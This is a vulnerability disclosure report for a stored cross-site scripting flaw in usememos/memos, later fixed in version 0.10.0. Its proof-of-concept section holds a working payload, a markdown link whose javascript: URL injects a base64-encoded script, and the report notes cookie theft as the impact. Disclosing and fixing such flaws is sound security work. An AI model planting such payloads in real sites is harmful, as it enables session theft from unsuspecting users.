Stored XSS by link markdown in usememos/memos

Valid

Reported on

Jan 5th 2023

Description

The site allows link markdown but does not validate, resulting in XSS.

Proof of Concept

Create new memo with payload

[Click me!](javascript:document.body.innerHTML="<script src='data:text/javascript;base64,YWxlcnQob3JpZ2luKTs='></script>")

Hold Ctrl and click to Click me!, a alert with content is domain name appear.

Impact

Stored XSS, stole victim cookie...

Occurrences

We are processing your report and will contact the usememos/memos team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
We have contacted a member of the usememos/memos team and are waiting to hear back a year ago
STEVEN validated this vulnerability a year ago
j0ok34n has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
STEVEN marked this as fixed in 0.10.0 with commit 0f8ce3 a year ago
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability a year ago
memo.go#L19 has been validated
to join this conversation